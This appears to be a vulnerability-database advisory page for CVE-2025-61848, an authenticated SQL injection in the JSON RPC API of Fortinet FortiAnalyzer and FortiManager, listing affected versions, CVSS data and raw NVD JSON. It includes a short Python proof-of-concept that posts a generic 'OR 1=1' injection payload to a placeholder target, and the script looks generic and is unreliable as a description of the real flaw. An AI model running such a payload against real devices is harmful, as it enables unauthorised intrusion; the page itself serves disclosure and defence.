Security Vulnerability Report
中文
CVE-2025-61848 CVSS 7.2 HIGH

CVE-2025-61848

Published: 2026-04-14 16:16:32
Last Modified: 2026-04-20 18:05:42
Source: [email protected]

Description

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* - VULNERABLE
FortiAnalyzer 7.0 所有版本
FortiAnalyzer 7.2 所有版本
FortiAnalyzer 7.4.0 至 7.4.8
FortiAnalyzer 7.6.0 至 7.6.4
FortiAnalyzer Cloud 7.0 所有版本
FortiAnalyzer Cloud 7.2 所有版本
FortiAnalyzer Cloud 7.4.0 至 7.4.8
FortiAnalyzer Cloud 7.6.0 至 7.6.4
FortiManager 7.0 所有版本
FortiManager 7.2 所有版本
FortiManager 7.4.0 至 7.4.8
FortiManager 7.6.0 至 7.6.4
FortiManager Cloud 7.0 所有版本
FortiManager Cloud 7.2 所有版本
FortiManager Cloud 7.4.0 至 7.4.8
FortiManager Cloud 7.6.0 至 7.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target configuration target_url = "https://<target-ip>/jsonrpc" headers = { "Content-Type": "application/json", "Cookie": "<authenticated_session_cookie>" } # Vulnerable payload demonstrating SQL Injection via JSON RPC # This payload attempts to manipulate a SQL query logic payload = { "id": 1, "method": "exec", "params": [ { "data": "valid_data' OR 1=1-- " } ] } try: response = requests.post(target_url, data=json.dumps(payload), headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:", response.text) else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61848", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:31.610", "lastModified": "2026-04-20T18:05:41.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "FB8E4D80-6F2B-476C-AC28-981416A6C26D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "00645EEE-3E67-4B98-BB49-B23AD1D60B54"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "927AF131-67C2-4DA4-9171-7C5CCA52C7F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "EFE9F8B4-3B5B-43FC-A286-11A5DFB43393"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "522F42DB-51DC-4FF2-ADA1-AB3129E939CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "9F4A9AA3-C6AA-428B-AE1B-61F61658D642"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "3EE58778-BB43-439E-887B-F6E401A2B67C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "CBA159E6-BBE9-4630-800A-5C4B3BAF23BB"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-111", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.